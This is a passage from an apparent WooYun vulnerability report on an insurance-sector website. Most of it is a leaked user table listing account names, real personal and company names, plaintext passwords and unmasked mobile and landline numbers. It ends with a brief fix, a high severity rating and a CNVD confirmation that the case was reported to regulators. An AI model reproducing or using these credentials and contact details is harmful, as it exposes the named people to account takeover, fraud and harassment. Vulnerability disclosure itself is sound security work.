| hz_001 | 杭州客服组长 | kfkfkefekfk | <blank> | <blank> | <blank> |
| jam.ling | 凌杰 | FJ2295 | jam.ling@**.**.**.** | 13801606088 | 13801606088 |
| Jane.010 | Jane | 888888 | <blank> | <blank> | <blank> |
| Jane.020 | Jane | 888888 | <blank> | <blank> | <blank> |
| Jane.021 | Jane | elle1688 | <blank> | <blank> | <blank> |
| jane.liu | 刘丽珍 | elle1688 | jane@**.**.**.** | 021-62269859*585 | 13818572800 |
| jason.zhu | 朱磊 | ZHULEI | jason.zhu@**.**.**.** | 18653157631 | <blank> |
| Jenny.Fu.010 | 傅丽娟 | 123456 | jenny.fu@**.**.**.** | <blank> | <blank> |
| Jenny.Fu.020 | 傅丽娟 | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.021 | 傅丽娟 | 000000 | <blank> | <blank> | <blank> |
| Jenny.Fu.024 | 傅丽娟 | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.027 | 傅丽娟 | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.028 | 傅丽娟 | 111111 | jenny.fu@**.**.**.** | <blank> | <blank> |
| Jenny.Fu.0451 | 傅丽娟 | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.0571 | 傅丽娟 | 111111 | <blank> | <blank> | <blank> |
| jenny.fu.0579 | 傅丽娟 | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.0755 | 傅丽娟 | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.573 | jenny | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.576 | jenny | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.5761 | jenny | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.577 | jenny | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.5791 | jenny | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.663 | jenny | 111111 | <blank> | <blank> | <blank> |
| Jenny.Fu.hq | Jenny | 123456 | <blank> | <blank> | <blank> |
| jerry.shen | 沈沉 | 111111 | jerry.shen@**.**.**.** | 0571-88136237 | 13575765862 |
| Jessica.zhang | 章泓琰 | 111111 | <blank> | <blank> | <blank> |
| jiangyafang | 姜亚芳 | 123456 | <blank> | <blank> | <blank> |
| jike | 上海际珂信息科技有限公司 | 123456 | <blank> | <blank> | <blank> |
| jim.xiao | 肖建双 | 000000 | jim.xiao@**.**.**.** | <blank> | 18618288810 |
| jinhangweb1 | 金航网(人保人寿深圳单次)合作公司 | 111111 | <blank> | <blank> | <blank> |
| jinhangweb10 | 金航网(人保人寿深圳10日)合作公司 | 111111 | <blank> | <blank> | <blank> |
| jintong | 合作公司-今通 | 111111 | <blank> | <blank> | <blank> |
| JMKJ | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ01 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ02 | 王鹏 | 111111 | <blank> | <blank> | <blank> |
| JMKJ03 | 王鹏 | 111111 | <blank> | <blank> | <blank> |
| JMKJ04 | 李永刚 | 111111 | <blank> | <blank> | 15907716551 |
| JMKJ05 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ06 | 鸿兴隆物流公司 | 111111 | <blank> | <blank> | <blank> |
| JMKJ07 | 昆明志成物流 | 111111 | <blank> | <blank> | <blank> |
| JMKJ08 | 顺通陆运物流公司 | 111111 | <blank> | <blank> | <blank> |
| JMKJ09 | 杨宗庆 | 111111 | <blank> | <blank> | <blank> |
| JMKJ10 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ100 | 正顺货运 | 111111 | <blank> | 13466275156 | <blank> |
| JMKJ11 | 保华物流 | 111111 | <blank> | <blank> | <blank> |
| JMKJ12 | 侯广福 | 111111 | <blank> | <blank> | <blank> |
| JMKJ13 | 昆明市兴旺物流 | 111111 | <blank> | <blank> | <blank> |
| JMKJ14 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ15 | 东北绥中物流公司 | 111111 | <blank> | <blank> | <blank> |
| JMKJ16 | 河口贵云货运物流中心 | 111111 | <blank> | <blank> | <blank> |
| JMKJ17 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ18 | 昆明恒捷货运中心 | 111111 | <blank> | <blank> | <blank> |
| JMKJ19 | 云南正顺物流公司 | 111111 | <blank> | <blank> | <blank> |
| JMKJ20 | 西北愈川货运部 | 111111 | <blank> | 13578294825 | 13578294825 |
| JMKJ200 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ201 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ202 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ203 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ204 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ205 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ206 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ207 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ208 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ209 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ21 | 徐问珅 | 111111 | <blank> | <blank> | <blank> |
| JMKJ210 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ211 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ212 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ213 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ214 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ215 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ216 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ217 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ218 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ219 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ22 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ220 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ221 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ222 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ223 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ224 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ225 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ226 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ227 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ228 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ229 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ23 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ230 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ24 | 杨宗庆 | 111111 | <blank> | <blank> | <blank> |
| JMKJ25 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ26 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ27 | 董华明 | 111111 | <blank> | <blank> | 13888667395 |
| JMKJ28 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ29 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ30 | 顺通陆运物流公司 | 111111 | <blank> | <blank> | <blank> |
| JMKJ300 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ301 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ302 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ303 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ304 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ305 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ306 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ307 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ308 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ309 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ31 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ310 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ311 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ312 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ313 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ314 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ315 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ316 | 上海京盟电子商务 | 111111 | <blank> | <blank> | <blank> |
| JMKJ317 | 上海京盟电子商务 | 111111 | <b

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-11 10:30

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无